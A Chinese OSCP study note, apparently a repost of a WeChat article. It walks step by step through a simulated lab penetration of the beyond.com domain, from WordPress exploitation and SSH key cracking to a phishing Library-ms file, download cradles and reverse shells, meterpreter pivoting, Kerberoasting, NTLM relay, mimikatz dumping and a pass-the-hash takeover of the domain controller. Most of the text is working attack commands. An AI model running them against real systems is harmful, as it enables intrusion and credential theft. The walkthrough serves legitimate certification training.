本篇对应教材第24章,将之前学习的技术组合使用,模拟一次渗透攻击。主要内容“枚举”、“获得同网段机器权限”、“访问内部网络”、“获取内部网络”、“攻击内部WEB应用”和“获得域控”,记录使用工具和命令
24.1 枚举
24.1.1MAILSRV01
两台机器WEBSRV01和MAILSRV01
mail01扫描
sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
24.1.2 WEBSRV01
sudo nmap -sC -sV -oN websrv1/nmap 192.168.50.244whatweb http://192.168.50.244wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
发现插件
searchsploit duplicator24.2 获取同网段机器权限
searchsploit -x 50420目录遍历
python3 50420.py http://192.168.50.244 /etc/passwdpython3 50420.py http://192.168.50.244 /home/daniela/.ssh/id_rsachmod 600 id_rsassh -i id_rsa daniela@192.168.50.244
需要密码
ssh2john id_rsa > ssh.hashjohn --wordlist=/usr/share/wordlists/rockyou.txt ssh.hashtequieromucho (id_rsa)
ssh -i id_rsa daniela@192.168.50.244登录成功
提权
cp /usr/share/peass/linpeas/linpeas.sh .python3 -m http.server 80wget http://192.168.119.5/linpeas.shchmod a+x ./linpeas.sh./linpeas.sh
发现sudo -l
(ALL) NOPASSWD: /usr/bin/git发现数据库账号和密码
╔══════════╣ Analyzing Wordpress Files (limit 70)-rw-r--r-- 1 www-data www-data 2495 Sep 27 11:31 /srv/www/wordpress/wp-config.phpdefine( 'DB_NAME', 'wordpress' );define( 'DB_USER', 'wordpress' );define( 'DB_PASSWORD', 'DanielKeyboard3311' );
发现git目录
╔══════════╣ Analyzing Github Files (limit 70)drwxr----- 8 root root 4096 Sep 27 14:26 /srv/www/wordpress/.git
GTFOBins查看git的sudo提权
sudo git -p help config!/bin/bashwhoami
获得root权限
到git目录查看
cd /srv/www/wordpress/git statusgit loggit show 612ff5783cc5dbd1e0e008523dba83374a84aaf1
查看git信息,获得其他主机账号密码
git show 612ff5783cc5dbd1e0e008523dba83374a84aaf124.3 访问内部网络
kali@kali:~/beyond$ cat usernames.txtmarcusjohndanielakali@kali:~/beyond$ cat passwords.txttequieromuchoDanielKeyboard3311dqsTwTpZPn#nL
收集账号和密码,进行登录破解
crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success没有pwn!标志,查看共享
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares只读权限
钓鱼攻击
mkdir /home/kali/beyond/webdav/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
创建config.Library-ms
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"><name>@windows.storage.dll,-34582</name><version>6</version><isLibraryPinned>true</isLibraryPinned><iconReference>imageres.dll,-1003</iconReference><templateInfo><folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType></templateInfo><searchConnectorDescriptionList><searchConnectorDescription><isDefaultSaveLocation>true</isDefaultSaveLocation><isSupported>false</isSupported><simpleLocation><url>http://192.168.119.5</url></simpleLocation></searchConnectorDescription></searchConnectorDescriptionList></libraryDescription>
创建快捷方式install,放到/home/kali/beyond/webdav目录
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.5:8000/powercat.ps1'); powercat -c 192.168.119.5 -p 4444 -e powershell"cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .config.Library-ms也放到/home/kali/beyond
在/home/kali/beyond开启8000端口web服务
python3 -m http.server 8000nc -nvlp 4444
钓鱼邮件
sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -apUsername: johnPassword: dqsTwTpZPn#nL
获得CLIENTWK1权限
24.4 获取内部网络
提权枚举
cd C:Usersmarcusiwr -uri http://192.168.119.5:8000/winPEASx64.exe -Outfile winPEAS.exe.winPEAS.exesysteminfo
是win11操作系统,winPEAS误报是win10
发现172段
Entry Name Datadcsrv1.beyond.com DCSRV1.beyond.com 172.16.6.240mailsrv1.beyond.com mailsrv1.beyond.com 172.16.6.254
AD域自动枚举
cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .iwr -uri http://192.168.119.5:8000/SharpHound.ps1 -Outfile SharpHound.ps1powershell -ep bypass.SharpHound.ps1-CollectionMethod All
列出AD用户和计算机,需要在BloodHound的底部RawQuery输入查询语句
MATCH (m:Computer) RETURN mMATCH (m:User) RETURN m
获得
DCSRV1.BEYOND.COM - Windows Server 2022 StandardINTERNALSRV1.BEYOND.COM - Windows Server 2022 StandardMAILSRV1.BEYOND.COM - Windows Server 2022 StandardCLIENTWK1.BEYOND.COM - Windows 11 Pro
查ip
nslookup INTERNALSRV1.BEYOND.COM获得
172.16.6.240 - DCSRV1.BEYOND.COM-> Domain Controller172.16.6.241 - INTERNALSRV1.BEYOND.COM172.16.6.254 - MAILSRV1.BEYOND.COM-> Mail Server-> Dual Homed Host (External IP: 192.168.50.242)172.16.6.243 - CLIENTWK1.BEYOND.COM-> User _marcus_ fetches emails on this machine
用户
BECCYJOHNDANIELAMARCUS
使用gui功能查询域管Find all Domain Admins(beccy)
没发现其他有用的信息,查询服务和会话
查询当前活跃会话
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p域管理员帐户Beccy在MAILSRV1上有一个活动会话,使用gui页面的“List all Kerberoastable Accounts”功能,发现krbtgt和daniela
在gui的Node Info中查看SPN节点,发现http/internalsrv1.beyond.com
在CLIENTWK1上做代理
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.5 LPORT=443 -f exe -o met.exesudo msfconsole -quse multi/handlerset payload windows/x64/meterpreter/reverse_tcpset LHOST 192.168.119.5set LPORT 443set ExitOnSession falserun -j
CLIENTWK1上
iwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe.met.exe
代理
use multi/manage/autorouteset session 1runuse auxiliary/server/socks_proxyset SRVHOST 127.0.0.1set VERSION 5run -j
cat /etc/proxychains4.conf...socks5 127.0.0.1 1080
枚举共享,没有有用信息
proxychains -q crackmapexec smb 172.16.6.240-241 172.16.6.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --sharesnmap扫描
sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254使用chisel做代理更加稳定
chmod a+x chisel./chisel server -p 8080 --reverse
sessions -i 1upload chisel.exe C:\Users\marcus\chisel.exechisel.exe client 192.168.119.5:8080 R:80:172.16.6.241:80
kali访问http://127.0.0.1/wordpress/wp-admin,报错,改hosts
cat /etc/hosts127.0.0.1 localhost127.0.1.1 kali...127.0.0.1 internalsrv1.beyond.com
可以正常访问了,后台没有弱口令
24.5 攻击内部Web应用
Kerberoasting
proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john获得daniela.hash,破解
sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force登录/wp-admin后台(daniela/DANIelaRO123)
BackupMigration插件可以利用,hash中继到mail01
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.242 -c "powershell -enc JABjAGwAaQ..."nc -nvlp 9999
使用备份插件,输入“//192.168.119.5/test”
中继成功,获得shell
24.6 获得域控
获取缓存凭证,因为已经是本地system权限了,上传mimikatz获取hash
cd C:UsersAdministratoriwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe.met.exesessions -i 2shellpowershelliwr -uri http://192.168.119.5:8000/mimikatz.exe -Outfile mimikatz.exe.mimikatz.exeprivilege::debugsekurlsa::logonpasswordsPrimaryUsername : beccyDomain : BEYONDNTLM : f0397ec5af49971f6efbdb07877046b3SHA1 : 2d878614fb421517452fd99a3e2c52dee443c8ccDPAPI : 4aea2aa4fa4955d5093d5f14aa007c56tspkg :wdigest :Username : beccyDomain : BEYONDPassword : (null)kerberos :Username : beccyDomain : BEYOND.COMPassword : NiftyTopekaDevolve6655!#!
登录域控
proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.6.240whoamihostnameipconfig
我在第一篇里提到的一些有价值的认证,还有什么质量高的认证考试我没想到的,可以私我
原文始发于微信公众号(高级红队专家):OSCP | 组合模拟攻击
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论